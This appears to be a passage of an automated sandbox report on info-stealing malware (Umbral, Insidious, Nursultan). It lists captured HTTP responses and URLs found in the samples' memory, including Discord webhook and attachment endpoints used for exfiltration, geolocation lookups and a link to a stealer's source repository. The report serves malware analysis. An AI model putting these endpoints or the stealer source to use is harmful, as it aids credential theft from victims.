                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7731Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VV1ZPBJARFKHFCR3595N5CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e9e%2Fh7JVprtLxO%2FPbhfVD3y35jYJUvbc%2Fhetbc2uJSkZJJJxGS95uH8vHxplYooxhYojAIDEaG6XzKZLUZT3O4LPbtRgUzATZD2M6aE%2B8QftJwNYloxUdPZ5XYIa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a12ff040f7b-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 19283Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VV4FTY92EP4BGKDEW27XRCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UDdTmFlZmMAt7LXKvFqcrF8SKGsaosrWXlZWTCYkx9RjJN8jk8O78%2FkTaA9qlJr7eiPOzPe%2F87svJtHKwYI7baSVBG5wcrWV9AdcTw44YSVHXe1PC2JXZmM4TYQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a230fabc466-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 19288Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VV95PGB6QJJK8G04N4G00CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QGaO3PrubpmaYJ7uKjKJNOhaAauE%2BFEn2tUih6gNRBldnrJ5W01YBQUvUrFkSAfEwC%2BbCNwPpJM%2BkPxYAAXvWR%2FPLx8%2F1BeJwSksN%2BUh%2B%2Fap8BJ5p8w6jCLwIDJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a40fbd541e9-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7939Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VVD7KPNRD8RQ62YJBMSPRCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NhMnhnRZoWX7gt9qavAxJfKor8Dly6ty3%2Fv%2BnjPyphmcmKstsM8YXuJiPDhIczPU7ARbijNcsdln3ZIU%2FgMo%2B0j%2BJOJWrdRpK9oyCpsbsQmsptQovwUYH8%2BaSVPp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a5afdc642a5-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:49:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 24628Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VVFWKKNXEPRGEXVXN4475CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ChIRO7xaxtwSGCN%2BqMPvUv%2BsvGXGpUxkh3fu5IuflzcJdRXZgxIb%2BTbz3s3PpLPwOSyO3tqt8chNLEk35le%2B%2FJuUHaJGhsSx8%2Bdo6hn%2F0GnzHfDEFzvS0mxwH%2Fvo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a6bfbd9c325-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:49:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 30349Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VVHYZQ9PBP7HAC3YZ3B0KCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1kwaaSxU2BmqLERBew%2BkRroJClGGvA%2BE8%2BI4yK0wx4fJuncYL6tcZBJi2D%2FoelkCyTxTXCbH5gounPVLgc3BlSP9mLTa3qYlACwZsQ6KMkqS%2B0f27HBr6ab8WJB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a793805186d-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:49:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 33403Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VVPTE6J1V2K7M0WMRAR35CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkfgao4CTxxgQqeCA2MfDHtEyGAMcSgNvxdy4Se3LIQJN%2FLpEwNgEotNPodeYxTrYhpdv5piKkAEpcNeQiwx0rPtCZljuzNIeTDXHz7XI3S9hI%2FoTR06%2BoKx91CX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25a984c2b4282-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:49:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 11977Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VVV9X64BVZWK4Q6QMS891CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1o8K11UUPRYUzuGIgCZvqEsAePQfndC%2BdftMZSas4M87euai7PCc8fYhAK%2Fzv4BIFszf6Z7kcQ4MGxcwfbLt12hCQkAZ%2FYgTow14zAHS46f3wiQA0zHC1Ay0%2Bis"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25ab50fb07d06-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:49:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7759Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VVXGP7ME07HB8CT07821JCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TN7a3LITMkUnS64ko%2FUpC9UBkp5gNq7HMI%2BthqHRufsJ2qNDYaToFEAm9ZVnE%2FLaggHyMCtsN6%2FZ0%2B460leRosyRDpJ%2FpJWpuktEvTL0KqnyT4KrSiJ0FdyB35U7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25ac34a8442a1-EWRalt-svc: h3=":443"; ma=86400
                            Source: cert9.db.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                            Source: cert9.db.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                            Source: cert9.db.11.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                            Source: cert9.db.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                            Source: cert9.db.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                            Source: cert9.db.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                            Source: cert9.db.11.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                            Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://freegeoip.app
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB66A5000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fielH
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                            Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Microsoft Edge.exe, 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.3.dr, Microsoft Edge.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                            Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipbase.com
                            Source: powershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: cert9.db.11.drString found in binary or memory: http://ocsp.digicert.com0
                            Source: cert9.db.11.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                            Source: powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: cert9.db.11.drString found in binary or memory: http://x1.c.lencr.org/0
                            Source: cert9.db.11.drString found in binary or memory: http://x1.i.lencr.org/0
                            Source: nursultan.bat.4.drString found in binary or memory: https://0.0.0.0
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.vimeworld.ru/u
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.vimeworld.ru/user/name/
                            Source: Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.drString found in binary or memory: https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex=
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                            Source: Umbral.exe.4.drString found in binary or memory: https://discord.com/api/v10/users/
                            Source: Umbral.exe, 0000003D.00000002.2205074841.00000232B9D71000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe.4.drString found in binary or memory: https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comyhl8
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drString found in binary or memory: https://discordapp.com/api/v9/users/
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr.
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chro0b
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.0b
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/
                            Source: Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/8
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-Steal
                            Source: Umbral.exe.4.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-Stealerh
                            Source: powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                            Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipbase.com
                            Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126BC000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126E1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipbase.com/xml/
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1277266726186385433/128176282554
